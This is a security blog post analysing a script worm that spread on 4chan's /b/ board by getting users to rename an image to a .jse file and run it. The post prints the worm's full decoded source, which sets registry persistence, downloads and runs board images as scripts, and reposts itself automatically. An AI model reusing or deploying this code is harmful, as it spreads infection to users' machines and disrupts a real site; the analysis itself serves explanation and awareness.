BalaBit Blog

For those of you who do not know: 4chan is one of the biggest and, especially it’s sub-site called “/b/”, the most trafficked messageboards on the net. But all these tons people do not create value, do not discuss important (or even unimportant) matters: it’s complete and utter nonsense in a totally un-PC and NSFW way. To quote Wikipedia:

Douglas said of the board, “reading /b/ will melt your brain”, and cited Encyclopedia Dramatica’s definition of /b/ as “the asshole of the Internet”. Mattathias Schwartz of The New York Times likened /b/ to a “a high-school bathroom stall, or an obscene telephone party line”, while Baltimore City Paper wrote that “/b/ is the kid with a collection of butterfly knives and a locker full of porn … in the high school of the Internet”. Wired describes /b/ as notorious.

Sitting down to read /b/ is similar to watching Jerry Springer: you know it’ll suck away your IQ and that any respectable person will despise you for it, but anyway, for times when you can’t do anything meanful, it can be pretty much fun.

That fun was ruined a couple of days ago for all those /b/tards (that’s how the frequent posters call themselves) for a day when a virus based partly on some simple Windows scripting, partly on social engineering took over the site — and that’s when it starts to get interesting from the security point of view.

The basic concept of the virus was to get the user to download an image, rename it to 4chan.jse and run it as an excutable. The image is a script written using Windows Scripting Host and it’s encoded with Microsoft’s script encoder to make the site’s upload form accept it as an image. This script then fetches a random image from the messageboard, tries to run it as a script, and if it succeeds, it decides that it’s a previously posted instance of itself and reposts it to the site, making the virus spread even more. If the fetched image is not a runnable script, it just tries to fetch another one in an infinite loop.

As Microsoft’s script encoder is just a simple tool to prevent script kiddies from ripping off code used on websites, more like an obfuscator than a real encoder, the script could be decoded and the revealed WScript code is quite interesting. Not because it contains any clever tricks or elegant solutions: only because it’s quite rare to see sutch a simple yet so successful virus that can be understood without any knowledge of the affected system, or hell, even the programming language it was written in. So here it goes in all it’s glory, the <100 lines of code that stopped Rickrolling for one day:

GIF89aI = “x1!þ÷”;
var xhr = new ActiveXObject(“Msxml2.XMLHTTP”);
var shell = new ActiveXObject(“WScript.Shell”);
var fso = new ActiveXObject(“Scripting.FileSystemObject”);
var ie = new ActiveXObject(“InternetExplorer.Application”);

“‰”;
shell.currentDirectory = fso.getSpecialFolder(2);
shell.run(“cmd /c copy “” + WSH.scriptFullName + “” sys.jse”);
try {
“û”;
shell.regWrite(“HKCU\Software\Microsoft\Windows\CurrentVersion\Run\sysjse”, “wscript /b ” + fso.getSpecialFolder(2) + “\sys.jse”);
} catch(e) {}

while(1) { try {

xhr.open(“get”, “http://img.4chan.org/b/”, 0);
“ö”;
xhr.setRequestHeader(“If-Modified-Since”, new Date(0));
xhr.send();
var page = xhr.responseText;

try {
xhr.open(“get”, page.match(/<a href=”(http://img.4chan.org/b/src/d+….)/)[1], 0);
“è”;
xhr.send();
var im = new ActiveXObject(“Adodb.Stream”);
im.mode = 3;
im.type = 1;
im.open();
im.write(xhr.responseBody);
im.saveToFile(“j.jse”, 2);
“ÿ”;
shell.run(“wscript /b j.jse”);
} catch(e) {}

var bdry = (“”+Math.random()).substr(2);
var head = “rn–” + bdry + “rnContent-Disposition: form-data; name=”;

var part1 = fso.openTextFile(“y”, 2, 1);
“Ó”;
part1.write(head + “restornrn” + page.match(/<span id=”nothread(d+)/)[1] + head + “upfile; filename=a.gifrnrn”);
part1.close();

var part2 = fso.openTextFile(“z”, 2, 1);
“ú”;
part2.write((“”+Math.random()).substr(2) + head + “modernrnregistrn–” + bdry + “–rn”);
part2.close();

shell.run(“cmd /c copy /b y+sys.jse+z p”, 0, 1);

var post = new ActiveXObject(“Adodb.Stream”);
“Ù”;
post.mode = 3;
post.type = 1;
post.open();
post.loadFromFile(“p”);

try {
ie.navigate(“http://img.4chan.org/b/”);
do {
WSH.sleep(100);
“Å”;
} while (ie.readyState != 4);
ie.stop();
ie.document.cookie = “nws_style=; expires=” + new Date(0) + “; path=/; domain=.4chan.org”;
} catch(e) {}

“ö”;
xhr.open(“post”, “http://dat.4chan.org/b/imgboard.php”, 0);
xhr.setRequestHeader(“Content-Type”, “multipart/form-data; boundary=” + bdry);
xhr.send(post);

WSH.sleep(50000);

} catch(e) {} }

It turns out that it has actually been the sixth time a similar virus took down the site. There have been trickier variations that took pictures from the users’s My Documents folder to use them as new containers for the program and simpler ones that simply posted the script itself along with instructions to copy-paste and save it using Notepad.

Don’t even get me started on how many levels the spread of this virus could have been prevented (users not downloading and running unknown things from a site they know gathers the worst kind of crowd, captchas preventing automated posting etc.). One thing is sure: the site’s administrators managed to stop the repostings and a day later, business was back to usual. And we got to see yet again how an extremely simple piece of code can bring an entire site down in a matter of hours.